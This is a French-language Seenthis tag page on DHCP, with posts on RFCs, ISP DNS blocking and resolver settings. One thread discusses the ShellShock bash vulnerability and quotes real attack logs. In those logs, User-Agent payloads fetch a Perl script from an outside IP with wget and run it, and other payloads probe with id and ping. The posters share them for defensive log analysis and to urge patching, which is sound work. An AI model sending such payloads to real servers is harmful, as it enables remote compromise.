Seenthis
•
 
Identifiants personnels
  • [mot de passe oublié ?]

 
  • #d
  • #dh
RSS: #dhcp

#dhcp

  • #dhcpv6
  • #dhcp_snooping
  • @klaus
    klaus++ @klaus 24/10/2020

    Gelöst : Vergabe feste IP-Adresse bei Speedport 724V | Telekom hilft Community
    ▻https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Vergabe-feste-IP-Adresse-bei-Speedport-724V/td-p/262836
    Auskunft Henning H. von den Telekomikern : Jeht nich.

    ich möchte gerne beim Speedport 724V für einige meiner LAN und WLAN-Endgeräte im Heimnetzwerk (NAS, Medienserver usw.) feste IP-Adressen vergeben. Leider finde ich keine passende Einstellung hierfür. DHCP habe ich wahlweise ausgeschaltet. Ich kann aber entweder nur neue Geräte mit deren MAC-Adresse beim Speedport 724V anmelden oder bei vorhandenen Geräten deren Namen ändern. Aber leider nirgends die passende Einstellung finden.
    Wo finde ich die Option für die feste Vergabe von IP-Adressen im Speedport-Menu?

    1 AKZEPTIERTE LÖSUNG am ‎08.02.2020 16:03
    Hallo @DaLuis09,
    Feste IP Adressen können Sie bei diesem Router nur nutzen, wenn Sie die Adressen direkt in den entsprechenden Endgeräten konfigurieren. Über den DHCP Server des Routers lassen sich keine festen Adressen zuweisen.

    Viele Grüße
    Henning H.

    #internet #LAN #DHCP

    klaus++ @klaus
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 12/06/2016
    2
    @supergeante
    @fredlm
    2

    Saviez-vous que le protocole réseau #DHCP, que votre machine utilise très probablement à chaque fois qu’elle se connecte, laisse fuiter plein d’informatiens dommageables pour votre #vie_privée ? Trois nouveaux #RFC explorent le problème et proposent une solution partielle.

    Analyse du problème pour DHCP en IPv4 : RFC 7819 « Privacy considerations for DHCP » ▻http://www.bortzmeyer.org/7819.html

    Analyse du problème pour DHCP en IPv6 : RFC 7824 « Privacy considerations for DHCPv6 » ▻http://www.bortzmeyer.org/7824.html

    Un profil DHCP qui limiterait le problème : RFC 7844 « Anonymity profile for DHCP clients » ▻http://www.bortzmeyer.org/7844.html

    Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @bloginfo
    bloginfo @bloginfo CC BY-NC-ND 22/03/2016

    4 jours pour comprendre les services #Réseau sous #Linux
    ▻http://www.dsfc.net/formations/reseau-formations/services-reseau-linux

    http://3.bp.blogspot.com/-6Td6kL5mcI0/UFOPA8XfEkI/AAAAAAAAAOE/U2qFxTKYGl8/s1600/images2.jpg

    Au cours de cette formation, nous aborderons le #SSH, #Iptables, Vstfpd, Apache, le NFS, Samba, mais aussi les serveurs #Dhcp et #Bind ainsi que #Postfix, #Dovecot et #Squid.

    #Centos #Dns #Formateur_Centos #Formateur_Linux #Formateur_Postfix #Formateur_Services_Réseaux_Linux #Formateur_Squid #Formateur_SquidGuard #Réseau_Linux #Réseaux_Linux #Services_Réseaux_Linux #SquidGuard

    bloginfo @bloginfo CC BY-NC-ND
    Écrire un commentaire

  • @bloginfo
    bloginfo @bloginfo CC BY-NC-ND 22/03/2016

    Se former à Ipv6
    ▻http://www.dsfc.net/formations/reseau-formations/se-former-a-ipv6

    En France, ça y est, la pénurie d’adresses IPv4 a commencé. Il est peut-être temps de songer à suivre une formation sur IPv6.

    #Réseau #Dhcp #Dns #Formateur_IPv6 #Formation_IPv6 #Icmpv6 #IPv6_Ready #Linux #Windows_10 #Windows_Server_2012_R2

    • #Ipv6
    bloginfo @bloginfo CC BY-NC-ND
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 7/09/2015

    RFC 7610 : DHCPv6-Shield : Protecting Against Rogue DHCPv6 Servers

    Un peu de sécurité #IPv6 sur le réseau local : comment protéger les pauvres machines Ipv6 contre un méchant serveur #DHCP, qui répond à la place du serveur légitime, et plus rapidement que lui ? Pas de surprise, la solution est la même qu’en IPv4 (#DHCP_snooping) et est détaillée dans ce #RFC : le commutateur bloque les réponses DHCP qui viennent d’un port où aucun serveur DHCP n’est censé être présent.

    ▻http://www.bortzmeyer.org/7610.html

    Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 11/06/2015
    1
    @02myseenthis01
    1

    RFC 7513 : SAVI Solution for DHCP

    Le cadre #SAVI (Source Address Validation Improvement), décrit dans le RFC 7039, vise à rendre plus difficile l’usurpation d’adresses IP. SAVI fournit un cadre général et plusieurs solutions techniques concrètes sont ensuite développées selon le type de réseau et selon le niveau de sécurité qu’on désire et qu’on est prêt à « payer ». Ainsi, le RFC 6620 décrivait un mécanisme où le réseau d’accès assurait que le premier titulaire d’une adresse IP puisse la garder. Ce nouveau #RFC décrit un autre mécanisme, où c’est via l’utilisation de DHCP qu’on contrôle les adresses : le réseau d’accès va empêcher l’utilisation d’adresses qui n’ont pas été allouées par le serveur DHCP. (Ce mécanisme est largement déployé depuis des années, sous divers noms, comme « #DHCP_snooping », mais n’avait pas été formellement décrit dans un RFC.)

    ▻http://www.bortzmeyer.org/7513.html

    #sécurité_Internet #adresse_IP

    Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 5/04/2015
    1
    @b_b
    1

    #Orange ne permet plus qu’on change les résolveurs #DNS configurés sur la #Livebox ▻http://assistance.orange.fr/les-adresses-dns-791.php

    Bien sûr, le geek de base peut toujours ignorer les annonces #DHCP de la Livebox et configurer à la main les cinq ou dix machines de sa maison (encore que, en dehors des PC classiques, ce n’est pas toujours facile, certains objets connectés ne permettent pas cette manip’) ou bien couper le serveur DHCP de la Livebox et mettre le sien (si quelqu’un connait un HOWTO précis sur le sujet...). Mais comment fera M. Michu ? Quelques pistes ▻http://www.homelabs.fr/bloc-notes-remplacer-livebox-routeur-asus ▻http://www.forum-orange.com/forums/viewtopic.php?pid=720848#p720848

    Pourquoi M. Michu voudrait-il changer ses résolveurs DNS ? Pour échapper à la censure administrative, par exemple (jeux en ligne, sites islamistes, sites de partage de la culture).

    À ma connaissance, Orange n’a pas officiellement expliqué ses raisons. Il semblerait que cela soit suite à un piratage des Livebox. Plutôt que de les sécuriser, il a semblé plus simple de les bloquer. ▻http://www.01net.com/editorial/624138/des-milliers-de-livebox-orange-piratees-par-un-detournement-de-dns ▻http://www.mac4ever.com/actu/91354_des-milliers-de-livebox-v2-ont-elles-ete-piratees ▻http://openclassrooms.com/forum/sujet/dns-orange-certificat-non-approuve-banque-lcl-1?page=1 ▻http://www.commentcamarche.net/forum/affich-30413343-usurpation-de-certificat-nomme-portswigger

    • #Free
    Stéphane Bortzmeyer @stephane CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 5/04/2015

      Apparemment, on peut faire cette opération (changer les résolveurs DNS) chez Free et Numericable. Chez SFR, comme chez Orange, c’est bloqué, ce qui augmente l’efficacité de la censure administrative par DNS menteurs.

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @france
      france-info @france 5/04/2015

      Je ne savais pas merci pour l’info !

      france-info @france
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 5/12/2014
    16
    @biggrizzly
    @homlett
    @fil
    @reka
    @0gust1
    @7h36
    @liotier
    @gblin
    @loloster
    @kozlika
    @nicolas2
    @touti
    @thibnton
    @goom
    @gastlag
    16

    Suite à la décision de la justice d’ordonner aux FAI français de bloquer #The_Pirate_Bay, via un mensonge dans les résolveurs #DNS ▻http://www.nextinpact.com/news/91265-pourquoi-the-pirate-bay-et-ses-miroirs-seront-bloques-en-france.ht , tous les rézosocios ont bruissé de messages du genre « pffff, m’en fiche, je vais changer de résolveur DNS et ils seront bien embêtés ». Pour les utilisateurs d’Unix, où la configuration du résolveur se fait dans le fichier /etc/resolv.conf, voici quelques exemples de configuration :

    M. Michu

    # Added automatically by the DHCP client
    nameserver 192.0.2.53
    # Automatically implements whatever policy is decided by the
    # entertainment industry

    Jean-Kevin, qui est un reBelZ dans son garage

    # Fuck la licepo, je suis un rebel
    # Google Public DNS
    nameserver 8.8.8.8
    nameserver 8.8.4.4

    Le père de Jean-Kevin, qui veut regarder The Pirate Bay mais veut aussi un résolveur professionnel et sécurisé

    # OpenDNS
    nameserver 208.67.222.222
    nameserver 208.67.220.220

    L’expert IPv6 qui trouve que la censure, c’est mal, mais qu’utiliser IPv4, c’est bien pire

    # Google Public DNS
    nameserver 2001:4860:4860::8888
    nameserver 2001:4860:4860::8844

    La grande sœur de Jean-Kevin, qui a une conscience politique

    # Résolveurs anti-censure de FDN
    nameserver 80.67.169.12
    nameserver 2001:910:800::12

    L’utilisateur d’ArchLinux ou de Gentoo, qui a lu les documents Snowden

    # Les Vrais Hommes mettent Unbound sur leur machine
    # Fuck Google aussi
    nameserver 127.0.0.1

    Le même, en version auto-radicalisé djihadiste IPv6

    nameserver ::1

    Le même, après avoir acheté un Raspberry Pi

    # Unbound sur le Pi
    nameserver 192.168.1.53
    • #Bay
    • #Google
    • #Norvège
    • #Jean-Kévin
    Stéphane Bortzmeyer @stephane CC BY-SA
    • @b_b
      b_b @b_b PUBLIC DOMAIN 5/12/2014

      #lol

      Merde je suis en mode papa...

      Jean-Kevin range ta chambre ty con !

      b_b @b_b PUBLIC DOMAIN
    • @kankan
      kankan @kankan CC BY-SA 5/12/2014

      Et ils vont tous avoir une surprise quand le serveur DHCP va réécrire le resolv.conf...

      kankan @kankan CC BY-SA
    • @reka
      Reka @reka CC BY-NC-SA 5/12/2014

      Ou installer un serveur en Norvège par exemple où pour l’instant, on ne parle pas du tout de bloquer quoi que soit d’autres que des quelques trucs pornos

      Reka @reka CC BY-NC-SA
    • @liotier
      liotier @liotier CC BY-SA 6/12/2014

      Idem - papa de Jean-Kevin : les listes d’exclusions à la carte d’OpenDNS sont une bonne première couche de censure pour limiter l’accès de mes cinq filles à des contenus potentiellement traumatisants à leur âge. Bon - ça c’est pour le LAN... Les hôtes de la DMZ domestique tapent sur un résolveur local - on a une dignité quand même !

      liotier @liotier CC BY-SA
    • @la_taupe
      La Taupe @la_taupe PUBLIC DOMAIN 6/12/2014

      Ca m’étonnerait pas aussi que les FAI filtrent directement au niveau des adresses IP, et dans ce cas il sera impossible d’accéder aux sites filtrés à moins de contourner par un proxy de type vpn.
      Ca me semble bien trop facile à contourner les DNS menteurs ... non ?

      La Taupe @la_taupe PUBLIC DOMAIN
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 6/12/2014
      @kankan

      @kankan Oui, problème connu : ►http://www.bortzmeyer.org/changer-dns.html #DHCP

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 6/12/2014
      @la_taupe

      @la_taupe La décision de justice ►http://www.nextinpact.com/news/91261-telecharger-en-pdf-decision-blocage-the-pirate-bay.htm suggère très fortement un blocage DNS. Oui, c’est contournable mais M. Michu le pourra-t-il ? Je ne suis pas satisfait d’une liberté réservée aux geeks et aux hackers.

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @la_taupe
      La Taupe @la_taupe PUBLIC DOMAIN 6/12/2014
      @stephane

      @stephane je suis du même avis que toi, que les FAI se conforment simplement au jugement et à la recommandation de bloquer la résolution des noms de domaines des sites de The Pirate Bay, c’est bien mieux pour Mme Michu, les geeks ou les hackers.

      Mais je pense que les FAI iront plus loin ; ils ont 15 jours pour apporter une réponse, et je pense que logiquement ils pourraient jouer le jeu des majors, en filtrant les adresses IP de tous les sites en question. Bien sur je ne souhaite pas ça, mais je ne serais pas surpris d’un blocage plus dur, qui priverait l’accès à Mme Michu.

      Je pense qu’un filtrage plus stricte envers le « réseau bittorrent » arrangerait bien les FAI, par exemple pour freiner les gourmand en bande passante.

      La Taupe @la_taupe PUBLIC DOMAIN
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 6/12/2014
      @la_taupe

      @la_taupe Concernant le filtrage par adresse IP, le « problème », du point de vue des censeurs, est que The Pirate Bay peut en changer souvent (plus que de noms de domaines, car ceux-ci nécessitent de prévenir les utilisateurs). Concernant le filtrage de BitTorrent, The Pirate Bay n’est après tout qu’un moteur de recherche, et pas le seul. Je ne crois pas qu’il soit responsable de la majorité du trafic BitTorrent (411, sites de partage privés...)

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @la_taupe
      La Taupe @la_taupe PUBLIC DOMAIN 6/12/2014
      @stephane

      Merci pour ta remarque @stephane, ça m’aide dans mon raisonnement. Mais je me demande toujours si tous les FAI amèneront la même « réponse », à savoir de ne pas répondre aux requêtes DNS pour les sites en question.

      Par exemple, est-ce que ça pourrait arranger certains FAI, de virer (droper) tout simplement les paquets « de type bittorrent », donc de faire du filtrage de paquet ? Bien sûr, en se mettant du point de vue d’un FAI dont les idées politiques seraient en accord avec celles des majors...

      La Taupe @la_taupe PUBLIC DOMAIN
    • @thomasschmit
      Thomas Schmit @thomasschmit CC BY-SA 6/12/2014
      @stephane

      @stephane, peux-tu expliquer la configuration de « l’utilisateur d’ArchLinux ou de Gentoo, qui a lu les documents Snowden » ?

      Thomas Schmit @thomasschmit CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 7/12/2014
      @thomasschmit

      @thomasschmit L’utilisateur a mis un résolveur local sur sa machine (comme décrit en ►http://www.bortzmeyer.org/son-propre-resolveur-dns.html ) et mis 127.0.0.1 (alias localhost, la machine locale) dans le resolv.conf pour diriger les requêtes DNS vers ce résolveur local.

      C’est la seule méthode correcte, du point de vue sécurité. Toutes les autres nécessitent de faire confiance à un tiers (le FAI, Google, FDN...) et à la sécurité du lien avec ce tiers (forcément faible pour le protocole UDP, qu’utilise le DNS).

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @b_b
      b_b @b_b PUBLIC DOMAIN 7/12/2014
      @stephane

      @stephane cité par ici : ▻http://www.zdnet.fr/actualites/pour-contourner-le-blocage-des-sites-web-il-suffit-de-changer-de-resolveur-dns

      b_b @b_b PUBLIC DOMAIN
    • @biggrizzly
      BigGrizzly @biggrizzly CC BY-NC-SA 7/12/2014

      Ça va mal se finir pour Stéphane ça...

      A la façon dont les ayant-droits étudient une action en justice contre les bloqueurs de publicité, ils étudient aussi une action en justice contre les contourneurs de décisions de justice.

      #mauvais_citoyens

      BigGrizzly @biggrizzly CC BY-NC-SA
    • @homlett
      Hoʍlett @homlett PUBLIC DOMAIN 7/12/2014

      https://31.media.tumblr.com/4aebfb42072149323a99aadad430ea46/tumblr_nesgtvs7sH1ttwgxzo1_1280.png

      Hoʍlett @homlett PUBLIC DOMAIN
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 10/12/2014

      Un assez bon résumé en français de cette histoire de choix du résolveur DNS ▻http://www.01net.com/editorial/636231/the-pirate-bay-contourner-un-blocage-dns-cest-trop-facile

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @homlett
      Hoʍlett @homlett PUBLIC DOMAIN 16/03/2015

      Bon et bien voilà, je me suis auto-radicalisé djihadiste IPv6...

      Hoʍlett @homlett PUBLIC DOMAIN
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 25/09/2014
    17
    @liotier
    @bram1
    @biggrizzly
    @petit_ecran_de_fumee
    @mhoungbo
    @fil
    @maieul
    @loloster
    @7h36
    @b_b
    @milouse
    @ben
    @severo
    @james
    @touti
    @suske
    @cy_altern
    17

    Une vulnérabilité idiote dans le #shell #bash (CVE-2014-6271) permet, dans certains environnements (serveurs Web, notamment), d’exécuter des commandes à distance : ▻https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-att ▻http://marc.info/?l=oss-security&m=141157106132018&w=2

    Administrateurs système Unix, il est urgent d’appliquer les mises à jour de bash.

    Les script kiddies sont à l’attaque depuis hier soir, visant notamment les sites Web : ▻https://gist.github.com/anonymous/929d622f3b36b00c0be1

    IP Address: 74.201.85.67
    Location: Atlanta, GA 30303
    http://target.tld:80/cgi-bin/test.sh
    http://target.tld:80/cgi-bin/info.sh
    http://target.tld:80/cgi-bin/test.sh
    http://target.tld:80/cgi-bin/php.fcgi
    http://target.tld:80/cgi-bin/php
    User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
    User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
    User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
    User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
    User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
    Timestamp: 9/26/2014 8:39:45 AM
    
    mais aussi des services comme git : ▻http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ckryys4

    Le patch est incomplet et un nouveau CVE a été enregistré, CVE-2014-7169, pour suivre le problème. Voir les nouvelles de ce ShellShock 2 en ▻http://seenthis.net/messages/296724

    #sécurité_informatique #shellshock

    • #Bonne
    Stéphane Bortzmeyer @stephane CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 25/09/2014

      Bonne (comme d’habitude) synthèse et explication sur ArsTechnica ▻http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it Des explications techniques en ▻http://lcamtuf.blogspot.fr/2014/09/quick-notes-about-bash-bug-its-impact.html ou ▻https://news.ycombinator.com/item?id=8361574

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @thibnton
      tbn @thibnton PUBLIC DOMAIN 25/09/2014
      @booz

      pour @booz, basher.

      tbn @thibnton PUBLIC DOMAIN
    • @liotier
      liotier @liotier CC BY-SA 25/09/2014

      “Everything you need to know about the Shellshock Bash bug”
      ▻http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

      liotier @liotier CC BY-SA
    • @liotier
      liotier @liotier CC BY-SA 25/09/2014

      Les utilisateurs de #Debian #Jessie peuvent temporairement passer #Bash en #Sid... ▻https://security-tracker.debian.org/tracker/CVE-2014-6271

      liotier @liotier CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 25/09/2014

      Si vous voulez voir le balayage de vos serveurs HTTP, egrep '\(\ *\)\ *\{' $HTTP_LOG Attention, celui qui fait de la pub pour ►http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html est un gentil.

      Un exemple du gentil :

      209.126.230.72 - - [25/Sep/2014:06:12:47 +0000] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" ada.bortzmeyer.org

      Les résultats du balayage du gentil (beaucoup de sites vulnérables) : ▻http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html

      Et un exemple d’un méchant :

      89.207.135.125 - - [2014-09-25 xx:xx:xx+0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 184 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
      Stéphane Bortzmeyer @stephane CC BY-SA
    • @fil
      Fil @fil 25/09/2014

      sur seenthis on a vu passer

      195.154.255.5 - - [25/Sep/2014:01:33:09 +0200] "GET / HTTP/1.1" 301 332 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
      195.154.255.5 - - [25/Sep/2014:09:35:26 +0200] "GET /local/cache-vignettes/L120xH26/95e44784569050aeecd6d992b19327fd-6a619.png HTTP/1.1" 200 2885 "http://seenthis.net/sites/553434" "() { :;}; echo; /usr/bin/id;"

      le second vient du même IP que le premier, et tente de passer par le champ referer ; sur mes autres serveurs je n’ai rien trouvé d’autre que le gentil

      Fil @fil
    • @b_b
      b_b @b_b PUBLIC DOMAIN 25/09/2014

      Quelques traces de méchants par chez moi aussi :

      89.207.135.125 - - [25/Sep/2014:09:22:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
      89.207.135.125 - - [25/Sep/2014:11:02:44 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

      même IP sur une autre machine :

      89.207.135.125 - - [25/Sep/2014:10:33:05 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
      b_b @b_b PUBLIC DOMAIN
    • @liotier
      liotier @liotier CC BY-SA 25/09/2014

      Les recommandations du CERT-FR : ▻http://www.cert.ssi.gouv.fr/site/CERTFR-2014-ALE-006/index.html

      liotier @liotier CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 26/09/2014

      Bon article sur ce que voit un pot de miel (aka les vraies attaques) ▻http://www.alienvault.com/open-threat-exchange/blog/attackers-exploiting-shell-shock-cve-2014-6721-in-the-wild

      Stéphane Bortzmeyer @stephane CC BY-SA
    • @liotier
      liotier @liotier CC BY-SA 26/09/2014

      Un petit POC d’exploitation via #DHCP : ▻https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept

      liotier @liotier CC BY-SA
    • @stephane
      Stéphane Bortzmeyer @stephane CC BY-SA 28/09/2014

      Il y a eu maintenant une très grande quantité d’articles sur ShellShock. Maintenant, il ne faut plus tout lister, il faut trier.

      En français, la meilleure explication technique, de loin : ▻https://linuxfr.org/news/une-faille-nommee-shellshock

      Une très bonne explication par le découvreur de la faille lui-même, ainsi qu’une discussion de ce que bash aurait dû faire : ▻http://unix.stackexchange.com/questions/157381/when-was-the-shellshock-cve-2014-6271-7169-bug-introduced-and-wh

      Une autre discussion sur comment réparer le problème proprement, argumentant qu’ajouter automatiquement toute fonction contenue dans une variable d’environnement quelconque était de la folie : ▻http://arstechnica.com/security/2014/09/still-more-vulnerabilities-in-bash-shellshock-becomes-whack-a-mole

      Pour éviter d’avoir cinquante mille PoC (Proof of Concept, une exploitation de la faille pour montrer qu’elle est réelle), un projet les regroupe toutes sur Github : ▻https://github.com/mubix/shellshocker-pocs

      Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 11/05/2014

    RFC 7227 : Guidelines for Creating New DHCPv6 Options

    « Le protocole #DHCPv6, normalisé dans le RFC 3315, permet de configurer des clients IPv6 depuis un serveur central, qui maintient un état (adresses IP attribuées, par exemple). Des tas d’options aux requêtes et réponses DHCPv6 permettent de fournir toutes sortes d’informations utiles. La liste de ces options n’est pas figée, on peut en définir de nouvelles. Ce nouveau #RFC guide les concepteurs d’options (et leurs collègues à l’#IETF qui examineront les nouvelles demandes d’options) : que faire lorsqu’on crée une nouvelle option DHCPv6 et surtout que faut-il ne pas faire. Il s’adresse donc surtout à un public de normalisateurs et de programmeurs. »

    ▻http://www.bortzmeyer.org/7227.html

    #DHCP #IPv6

    Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @bloginfo
    bloginfo @bloginfo CC BY-NC-ND 4/10/2013

    Une formation de 4 jours sur les services #réseaux #Linux avec #Bind , #Dhcp , #Ssh , #Postfix , #Dovecot , #Apache , #Vsftp , #NFS , #Samba et #Squid ! ▻http://www.dsfc.net/formation/formation-services-reseaux-linux

    bloginfo @bloginfo CC BY-NC-ND
    Écrire un commentaire

  • @stephane
    Stéphane Bortzmeyer @stephane CC BY-SA 22/12/2011

    RFC 6434 : IPv6 Node Requirements

    Il existe des tas de #RFC qui concernent #IPv6 et le programmeur qui met en oeuvre ce protocole dans une machine risque fort d’en rater certains, ou bien d’implémenter certains qu’il aurait pu éviter. Ce RFC est donc un méta-RFC, chargé de dresser la liste de ce qui est indispensable dans une machine IPv6. Les deux points les plus chauds concernent la configuration (par #DHCP ou par RA - Router Advertisment ?) et la gestion d’#IPsec (la légende « IPv6 est plus sûr car IPsec est obligatoire »), désormais officiellement facultative.

    ►http://www.bortzmeyer.org/6434.html

    Stéphane Bortzmeyer @stephane CC BY-SA
    Écrire un commentaire

  • @nhoizey
    Nicolas Hoizey @nhoizey CC BY-NC-SA 27/01/2010

    AirSnare - Intrusion Detection Software for Windows
    ►http://home.comcast.net/~jay.deboer/airsnare/index.html

    “AirSnare will alert you to unfriendly MAC addresses on your network and will also alert you to DHCP requests taking place.”

    #sécurité #réseau #WiFi #MAC #DHCP #supervision #airsnare #logiciel #windows

    Nicolas Hoizey @nhoizey CC BY-NC-SA
    Écrire un commentaire

Thèmes liés

  • #dhcp
  • #rfc
  • #linux
  • #dhcp
  • #dns
  • #mac
  • #réseau
  • #sécurité
  • company: ipsec
  • #ipv6
  • #ipsec
  • #airsnare
  • #rfc
  • #ipv6
  • #dhcp_snooping
  • #supervision
  • #wifi
  • #logiciel
  • #réseau
  • #dns
  • #squid
  • #dovecot
  • #postfix
  • #bind
  • #windows